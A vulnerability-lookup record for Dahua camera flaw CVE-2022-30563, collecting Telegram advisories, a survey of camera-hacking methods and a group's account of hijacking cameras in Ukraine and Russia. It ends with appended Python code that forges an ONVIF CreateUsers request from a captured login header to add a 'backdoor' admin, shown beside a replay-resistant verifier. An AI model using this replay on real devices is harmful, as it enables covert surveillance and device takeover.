{"vulnerability": "CVE-2022-30563", "sightings": [{"uuid": "08b8e37d-0f4c-4647-9342-0a9b698a2b6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/technical_private_cat/28", "content": "Going deeper down the rabbit hole, gentlemen \ud83d\udc07\nMany of you have surely wondered how \"the hacking of video surveillance cameras happens?\ud83c\udfa5\ud83d\udcf9\".\nLet's figure it out now!\nSome of the methods:\nMan in the middle;\nPassword brute-forcing;\nPacket sniffing;\nSome kind of DoS and flooding;\ud83d\udca5\nExploiting a vulnerability in web services, or some specific RCE (and not only RCE) vulnerabilities of a particular model, for example;\nCryptographic attacks;\nSimply searching for cameras with factory settings, social engineering;\nUsing viruses specially created for certain cameras;\ud83e\udda0\u2620\ufe0f\nSinkhole;\nLet's go over each one in more detail.\ud83d\udd0e\nMan in the middle - well, I think it's clear: when two parties \"talk\", he inserts himself in the middle.\nHow this is usually done: for example, by session hijacking; the attackers insert themselves as relays or proxy servers into the data transfer, using malicious phishing links and so on, or using cryptography.\nMore detail specifically on carrying out such an attack is in the articles below.\nPassword brute-forcing - this attack is fairly simple in essence; most often the attacker goes through passwords using special dictionaries with something like hydra\ud83d\udc0d - a well-known utility for brute-forcing passwords.\nPacket sniffing - this attack also often happens on the local network; the attacker simply sniffs the transmitted packets and looks for, say, authentication.\n\nDoS and flooding - this most often happens on the local network of the target; for example, ping flood is a common DoS-type attack, in which we knock the victim's device out of service and force it to reboot, and afterwards we intercept the login requests.\nVulnerabilities and RCE - well, as an example I'll cite the critical RCE vulnerability in the firmware of Hikvision IP cameras - CVE-2021-36260\nIt allows us to get full control over the victim's device, which gives far more access than even the device owner has.\nBesides full compromise of the IP camera, one can get access to internal networks and attack them.\nMoreover, an attack using this vulnerability is not even that hard to pull off; here is a link to an article with an analysis: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\nAlso interesting is the relatively new Dahua RCE vulnerability - CVE-2022-30563; this flaw lies in a broken authorization mechanism implemented by Dahua in some of its IP cameras.\nBecause of the missing checks against attacks, an attacker can sniff unencrypted ONVIF communication and replay the credentials in new requests to the camera, which the device will accept as valid.\nHaving obtained the credentials, the attacker can add an administrator account, and you yourselves understand what that leads to.\nA link to understand it in more detail: https://securityaffairs.co/wordpress/133877/security/dahua-severe-flaw.html\nCryptographic attacks - these are attacks, for example, on intercepting encryption keys, or some vulnerabilities in encryption algorithms; see the article below for more detail.\nSearching for cameras with factory settings - many people are foolish enough not to change the factory settings; to find such cameras one can use, for example, zoomeye or shodan, censys.\nSocial engineering - well, that's phishing or the like, for example. One can chat up the employees who work there.\nWriting viruses - the attacker writes some remote-access trojan or stealer and sends it to you. There are quite a lot of different kinds of viruses.\nSinkhole - compromise an internal node for inspection.\nWhat can camera hacking lead to?\nIt is especially dangerous in any military institutions or places with some secrecy.\nBut hacking cameras in ordinary offices, especially those of large companies, can also be dangerous, because the attacker can plan an \"attack in person\": having reconnoitered the employees and your surroundings, he can, for example, carry out a social engineering attack and walk into your office.\nThis is very dangerous.\nAnd I think that even if he doesn't do that, it's not very pleasant to realize that strangers are watching you through your cameras.\nWell, that's all from me - thanks for reading\u2764\ufe0f And remember, everything is in your hands - follow the white rabbit and you'll come to the light.\ud83d\udc07\u2728\n#camera", "creation_timestamp": "2022-08-24T07:23:03.000000Z"}, {"uuid": "ebf79e80-0bbf-4c5b-9a5c-cb25466dec32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/ics_cert/575", "content": "Nozomi Networks has discovered a vulnerability with a CVSS score of 7.4 in Dahua IP cameras that allows full control of the devices.\n\nCVE-2022-30563 affects the implementation of the Open Network Video Interface Forum (ONVIF) WS-UsernameToken authentication mechanism in some Dahua IP cameras.\n\nONVIF-compliant products allow users to perform various actions on a remote device using a set of standard application programming interfaces (APIs), including viewing camera footage, locking or unlocking a smart door, and performing maintenance operations.\n\nThis vulnerability can be exploited by attackers to compromise network cameras by intercepting an unencrypted ONVIF communication and reusing the credentials in a new request to the camera, which is accepted by the device as a valid authentication request.\n\nAttackers, especially APTs, may be interested in hacking IP cameras as part of espionage campaigns against the target's equipment or production processes. The information can serve the reconnaissance tasks performed before launching a cyberattack.\n\nAfter obtaining the credentials, the attacker can also add an administrator account and use it for full access to the device.\n\nThe following versions of Dahua video products are affected: Dahua ASI7XXX versions before v1.000.0000009.0.R.220620; Dahua IPC-HDBW2XXX versions before v2.820.0000000.48.R.220614; Dahua IPC-HX2XXX versions before v2.820.0000000.48.R.220614.\n\nThe vendor has fixed the issue by releasing a patch.\n\n\ud83d\udc6e\u200d\u2640\ufe0f\ud83d\udc6e\u200d\u2640\ufe0f Republishing the content of this channel is permitted only with attribution of the source and the channel's full address.\n\n\ud83c\udfedWebsite and specialized channel for the security of industrial automation and control infrastructure\n\nAdmin:\nhttps://t.me/pedram_kiani\nTelegram channel:\nhttps://t.me/ics_cert\nTwitter:\nhttps://twitter.com/icscerti", "creation_timestamp": "2022-08-05T11:33:04.000000Z"}, {"uuid": "027183b0-f5b9-4f75-88ef-7382dc79166b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/cKure/10024", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 A vulnerability, tracked as CVE-2022-30563, impacting Dahua IP cameras can allow attackers to seize control of IP cameras \ud83d\udcf7 \n\nhttps://securityaffairs.co/wordpress/133877/hacking/dahua-severe-flaw.html", "creation_timestamp": "2022-08-01T07:38:24.000000Z"}, {"uuid": "eb3be170-ec3f-49fe-9539-7112605bc82f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/tengkorakcybercrewz/4600", 
"content": "Hackers Arise IoT Hacking: How We Hacked the Dahua Cameras In Ukraine and Russia \nWelcome back, my aspiring cyberwarriors!\n\n\n\n\nAs you know, Hackers-Arise played a key role in the Ukrainian resistance  to Russia&apos;s brutal attack. We did many things to support Ukraine including attacking Russia&apos;s industrial infrastructure, DoS&apos;ed the corporate and government websites, and trained hackers to protect Ukraine. What we may be most famous for is the hacking of IP cameras throughout Ukraine at the request of the Ukraine army to surveil Russian movements and war crimes in the country.\n\n\n\n\n\n\n\n\n\n\nHere is a small sampling of some of the pictures we captured.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nAt the time, we did not reveal our techniques (for obvious reasons) but that two years have passed and the vulnerability patched, we are ready to reveal to the world how we hacked so many cameras in both Ukraine and Russia!\n\n\n\n\nAs we revealed in earlier tutorials, we used default credentials for many of the cameras and brute forced the credentials for many others. This harvested about 15-20% of the cameras we targeted.  It&apos;s always important to try to get the \"low-hanging fruit\" first.The remaining 80% we were able to use two exploits, one that was a zero-day against Dahua cameras. \n\n\n\n\nLet&apos;s focus on that one.\n\n\n\n\nDahua Zero-Day\n\n\n\n\nDahua is a China-based IP camera manufacturer that is among the world&apos;s largest. Besides making cameras with their own name, they also private label cameras for many other re-sellers. Their cameras are literally all over the world!\n\n\n\n\nOn June 28, 2022, the good people at NIST announced a new vulnerability in the Dahua cameras and assigned it CVE-2022-30563 and gave it a base score of 7.8. 
They described the vulnerability as:\n\n\n\n\nWhen an attacker uses a man-in-the-middle attack to sniff the request packets with success logging in through ONVIF, he can log in to the device by replaying the user&apos;s login packet.\n\n\n\n\nan article on SecurityAffairs.com described the vulnerability in a headline that read:\n\n\n\n\n\"A flaw in Dahua IP Cameras allows full take over of the devices\"\n\n\n\n\nThis was several months after we had been successfully exploiting this flaw in cameras in both Ukraine and Russia.\n\n\n\n\nWhat is ONVIF?\n\n\n\n\nONVIF is the Open Network Video Interface Forum. This is an open standard that is used in IP-based physical security products. ONVIF products allow access through a set of standardized API&apos;s. These API&apos;s allow the user to watch the video from the camera, unlock smart doors, and add users and passwords. ONVIF requests are transmitted through XML SOAP messages.\n\n\n\n\nThe ONVIF accepts, among other authentication mechanisms, WS-UsernameToken such as seen below.\n\n\n\n\nNote that the WS-UsernameToken accepts:\n\n\n\n\n1. \na username\n\n2. \na nonce\n\n3. \nCreated\n\n4. \npassword\n\n\n\n\n\nWS-UsernameToken then generates a Base64 digest. This helps to obscure this data, most importantly, the password from being intercepted an used in a MiTM attack. By incorporating the timestamp, it also prevents replay attacks.\n\n\n\n\n\n\n\n\n\n\nTo be successful, the attacker must first sniff a single unencrypted ONVIF request such as shown above. This is relatively easy as WS-UsernameToken is used by default on these devices and they use HTTP rather than HTTPS, so the transmission is unencrypted.\n\n\n\n\nNext, the attacker then forges a new CreateUsers request that adds a new user with admin privileges!\n\n\n\n\n\n\n\n\n\n\nOnce the new admin account has been created, the attacker can then simply login into the new account and take control of the device. 
This includes zoom, tilt and pan (if enabled) and deleting other accounts, including other admin accounts.\n\nSummary\n\nInternet of Things devices are everywhere and in most cases their security[...]", "creation_timestamp": "2024-09-25T22:32:27.000000Z"}, 
{"uuid": "f4135ed3-8d6a-45ca-aa33-b812804c8cda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/true_secator/3236", "content": "Nozomi Networks has discovered a vulnerability with a CVSS score of 7.4 in Dahua IP cameras that allows full control of the devices.\n\nCVE-2022-30563 affects the implementation of the Open Network Video Interface Forum (ONVIF) WS-UsernameToken authentication mechanism in some Dahua IP cameras.\n\nONVIF-compatible products let users perform various actions on a remote device through a set of standardized application programming interfaces (APIs), including viewing video from the camera, locking or unlocking a smart door, and performing maintenance operations.\n\nThe vulnerability can be used by attackers to compromise network cameras by intercepting unencrypted ONVIF traffic and reusing the credentials in a new request to the camera, which the device will accept as a valid authenticated request.\n\nAttackers, APT groups in particular, may be interested in compromising IP cameras as part of espionage campaigns against a target's equipment or production processes. The information can support reconnaissance carried out before a cyberattack begins.\n\nHaving obtained the credentials, an attacker can also add an administrator account and use it to gain full access to the device.\n\nThe following versions of Dahua video products are affected: Dahua ASI7XXX versions before v1.000.0000009.0.R.220620; Dahua IPC-HDBW2XXX versions before v2.820.0000000.48.R.220614; Dahua IPC-HX2XXX versions before v2.820.0000000.48.R.220614.\n\nThe vendor has fixed the issue by releasing a corresponding patch.", "creation_timestamp": "2022-08-01T11:27:54.000000Z"}, 
{"uuid": "5f012a06-b54e-409c-8bcb-9e1e4dca1431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/cibsecurity/45306", "content": "\u203c CVE-2022-30563 \u203c\n\nWhen an attacker uses a man-in-the-middle attack to sniff the request packets with success logging in through ONVIF, he can log in to the device by replaying the user's login packet.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-28T18:36:08.000000Z"}, 
{"uuid": "99e82e59-b30b-4488-87d3-5b4787015887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/thehackernews/2424", "content": "Researchers have discovered a new vulnerability (CVE-2022-30563) in Dahua IP cameras that can be exploited by remote attackers to compromise the cameras.\n\nRead details: https://thehackernews.com/2022/07/dahua-ip-camera-vulnerability-could-let.html", "creation_timestamp": "2022-09-28T22:11:31.000000Z"}, 
{"uuid": "428e409e-04f7-4f29-baac-c5d0bed74915", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "exploited", "source": "https://t.me/haccking/8303", "content": "A Dahua IP camera vulnerability could allow attackers to gain full control of the devices\n\nDetails have been published about a security vulnerability in Dahua's implementation of the Open Network Video Interface Forum (ONVIF) standard, exploitation of which could lead to a takeover of IP cameras.\n\nTracked as CVE-2022-30563 (CVSS score: 7.4), \"attackers can use this vulnerability to compromise network cameras by intercepting a previous unencrypted ONVIF exchange and replaying the credentials in a new request to the camera,\" Nozomi Networks said in a report on Thursday.\n\nThe issue, fixed in a patch released on June 28, 2022, affects the following products:\n\nDahua ASI7XXX: Versions before v1.000.0000009.0.R.220620\n\nDahua IPC-HDBW2XXX: Versions before v2.820.0000000.48.R.220614\n\nDahua IPC-HX2XXX: Versions before v2.820.0000000.48.R.220614\n\nLife hack\ud83d\udc48", "creation_timestamp": "2022-07-29T19:24:54.000000Z"}, 
{"uuid": "c8bff0e0-9af4-4ed5-b423-fe6b7a17d8fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/tengkorakcybercrewz/21776", "content": "Hackers Arise IoT Hacking: How We Hacked the Dahua Cameras In 
Ukraine and Russia\nWelcome back, my aspiring cyberwarriors!\n\nAs you know, Hackers-Arise played a key role in the Ukrainian resistance to Russia's brutal attack. We did many things to support Ukraine, including attacking Russia's industrial infrastructure, DoS'ing corporate and government websites, and training hackers to protect Ukraine. What we may be most famous for is the hacking of IP cameras throughout Ukraine at the request of the Ukrainian army to surveil Russian movements and war crimes in the country.\n\nHere is a small sampling of some of the pictures we captured.\n\n[images not included in this extract]\n\nAt the time, we did not reveal our techniques (for obvious reasons), but now that two years have passed and the vulnerability has been patched, we are ready to reveal to the world how we hacked so many cameras in both Ukraine and Russia!\n\nAs we revealed in earlier tutorials, we used default credentials for many of the cameras and brute-forced the credentials for many others. This harvested about 15-20% of the cameras we targeted. It's always important to try to get the \"low-hanging fruit\" first. For the remaining 80% we were able to use two exploits, one of which was a zero-day against Dahua cameras.\n\nLet's focus on that one.\n\nDahua Zero-Day\n\nDahua is a China-based IP camera manufacturer that is among the world's largest. Besides making cameras under their own name, they also private-label cameras for many other resellers. Their cameras are literally all over the world!\n\nOn June 28, 2022, the good people at NIST announced a new vulnerability in the Dahua cameras and assigned it CVE-2022-30563 and gave it a base score of 7.8. 
They described the vulnerability as:\n\nWhen an attacker uses a man-in-the-middle attack to sniff the request packets with success logging in through ONVIF, he can log in to the device by replaying the user's login packet.\n\nAn article on SecurityAffairs.com described the vulnerability in a headline that read:\n\n\"A flaw in Dahua IP Cameras allows full take over of the devices\"\n\nThis was several months after we had been successfully exploiting this flaw in cameras in both Ukraine and Russia.\n\nWhat is ONVIF?\n\nONVIF is the Open Network Video Interface Forum. This is an open standard that is used in IP-based physical security products. ONVIF products allow access through a set of standardized APIs. These APIs allow the user to watch the video from the camera, unlock smart doors, and add users and passwords. ONVIF requests are transmitted as XML SOAP messages.\n\nONVIF accepts, among other authentication mechanisms, WS-UsernameToken, such as seen below.\n\n[image not included in this extract]\n\nNote that the WS-UsernameToken accepts:\n\n1. a username\n2. a nonce\n3. Created\n4. password\n\nWS-UsernameToken then generates a Base64 digest. This helps to obscure this data, most importantly the password, from being intercepted and used in a MiTM attack. By incorporating the timestamp, it also prevents replay attacks.\n\n[image not included in this extract]\n\nTo be successful, the attacker must first sniff a single unencrypted ONVIF request such as shown above. This is relatively easy as WS-UsernameToken is used by default on these devices and they use HTTP rather than HTTPS, so the transmission is unencrypted.\n\nNext, the attacker forges a new CreateUsers request that adds a new user with admin privileges!\n\n[image not included in this extract]\n\nOnce the new admin account has been created, the attacker can then simply log into the new account and take control of the device. 
This includes zoom, tilt and pan (if enabled) and deleting other accounts, including other admin accounts.\n\nSummary\n\nInternet of Things devices are everywhere and in most cases their security[...]", "creation_timestamp": "2024-09-25T22:32:27.000000Z"}]}
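The replay the Hackers-Arise post describes, as an added example that is not code from that post, from Nozomi's advisory or from Dahua firmware: it computes the ONVIF WS-UsernameToken PasswordDigest from the four fields listed above (username, nonce, Created, password), wraps a captured Security header around a tds:CreateUsers body that adds an Administrator user, and then checks that header against two verifiers. The first checks only the digest, which is all a device needs to do for the captured header to stay valid indefinitely; the second also enforces a freshness window on Created and rejects nonces it has already accepted. The `USERS` store, the `admin`/`backdoor` names and password strings, and the 5-minute window are constructed sample values for this example; CreateUsers is a real ONVIF device-service operation, but the element layout below is written for illustration rather than copied from a capture.

```python
# Added example (not from the Hackers-Arise post, Nozomi or Dahua): ONVIF
# WS-UsernameToken digest, a forged tds:CreateUsers reusing a captured header,
# and a digest-only verifier beside one that enforces Created/Nonce freshness.
import base64
import hashlib
import hmac
import os
from datetime import datetime, timedelta, timezone
from typing import Optional
from xml.sax.saxutils import escape

# Constructed sample credential store standing in for the camera's user database.
USERS = {"admin": "s3cret"}

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
WSSE_NS = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU_NS = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
DIGEST_TYPE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest"
TDS_NS = "http://www.onvif.org/ver10/device/wsdl"
TT_NS = "http://www.onvif.org/ver10/schema"
CREATED_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"


def password_digest(nonce_b64: str, created: str, password: str) -> str:
    """WS-UsernameToken PasswordDigest = Base64(SHA1(nonce + created + password))."""
    nonce = base64.b64decode(nonce_b64)
    digest = hashlib.sha1(nonce + created.encode() + password.encode()).digest()
    return base64.b64encode(digest).decode()


def make_token(username: str, password: str, now: Optional[datetime] = None) -> dict:
    """The four UsernameToken fields a legitimate ONVIF client sends."""
    now = now or datetime.now(timezone.utc)
    nonce_b64 = base64.b64encode(os.urandom(16)).decode()
    created = now.strftime(CREATED_FMT)
    return {"Username": username, "Nonce": nonce_b64, "Created": created,
            "PasswordDigest": password_digest(nonce_b64, created, password)}


def create_users_envelope(token: dict, new_user: str, new_password: str,
                          level: str = "Administrator") -> str:
    """tds:CreateUsers envelope whose Security header is copied verbatim from a
    captured request (illustrative layout, not a captured Dahua message)."""
    return (
        f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Header>'
        f'<wsse:Security xmlns:wsse="{WSSE_NS}" xmlns:wsu="{WSU_NS}"><wsse:UsernameToken>'
        f'<wsse:Username>{escape(token["Username"])}</wsse:Username>'
        f'<wsse:Password Type="{DIGEST_TYPE}">{token["PasswordDigest"]}</wsse:Password>'
        f'<wsse:Nonce>{token["Nonce"]}</wsse:Nonce>'
        f'<wsu:Created>{token["Created"]}</wsu:Created>'
        f'</wsse:UsernameToken></wsse:Security></s:Header>'
        f'<s:Body><tds:CreateUsers xmlns:tds="{TDS_NS}" xmlns:tt="{TT_NS}"><tds:User>'
        f'<tt:Username>{escape(new_user)}</tt:Username>'
        f'<tt:Password>{escape(new_password)}</tt:Password>'
        f'<tt:UserLevel>{level}</tt:UserLevel>'
        f'</tds:User></tds:CreateUsers></s:Body></s:Envelope>'
    )


class DigestOnlyVerifier:
    """Checks only that the digest matches the stored password, so a sniffed
    header stays valid indefinitely: the condition the replay relies on."""

    def verify(self, token: dict, now: Optional[datetime] = None) -> bool:
        password = USERS.get(token["Username"])
        if password is None:
            return False
        expected = password_digest(token["Nonce"], token["Created"], password)
        return hmac.compare_digest(expected, token["PasswordDigest"])


class ReplaySafeVerifier(DigestOnlyVerifier):
    """Same digest check, plus a freshness window on Created and a cache of
    accepted nonces. The 5-minute window is this example's choice."""

    def __init__(self, window: timedelta = timedelta(minutes=5)):
        self.window = window
        self.seen: dict = {}  # nonce -> Created; evicted once outside the window

    def verify(self, token: dict, now: Optional[datetime] = None) -> bool:
        now = now or datetime.now(timezone.utc)
        try:
            created = datetime.strptime(token["Created"], CREATED_FMT).replace(tzinfo=timezone.utc)
        except ValueError:
            return False
        if abs(now - created) > self.window:
            return False  # stale or future-dated Created
        self.seen = {n: c for n, c in self.seen.items() if abs(now - c) <= self.window}
        if token["Nonce"] in self.seen:
            return False  # nonce already accepted: replay
        if not super().verify(token, now):
            return False
        self.seen[token["Nonce"]] = created
        return True


def replay_demo() -> dict:
    """Capture one login, replay its header on a forged CreateUsers, compare verifiers."""
    t0 = datetime(2022, 6, 1, 12, 0, 0, tzinfo=timezone.utc)
    captured = make_token("admin", "s3cret", t0)  # sniffed from plain-HTTP ONVIF
    forged = create_users_envelope(captured, "backdoor", "Pwn3d!2022")
    weak, fixed = DigestOnlyVerifier(), ReplaySafeVerifier()
    return {
        "forged_carries_captured_nonce": captured["Nonce"] in forged and "tds:CreateUsers" in forged,
        "weak_accepts_replay_months_later": weak.verify(captured, t0)
                                            and weak.verify(captured, t0 + timedelta(days=90)),
        "fixed_accepts_original": fixed.verify(captured, t0),
        "fixed_rejects_replay": not fixed.verify(captured, t0 + timedelta(seconds=1)),
        "fixed_rejects_stale": not ReplaySafeVerifier().verify(captured, t0 + timedelta(days=90)),
    }


if __name__ == "__main__":
    for check, ok in replay_demo().items():
        print(f"{check}: {ok}")
```

The nonce and Created fields only defeat replay when the device actually checks them; a verifier that stops at the digest comparison accepts the captured header on any body, including CreateUsers, for as long as the password is unchanged. Note also that none of this helps while the request travels over plain HTTP, since the attacker needs only one capture.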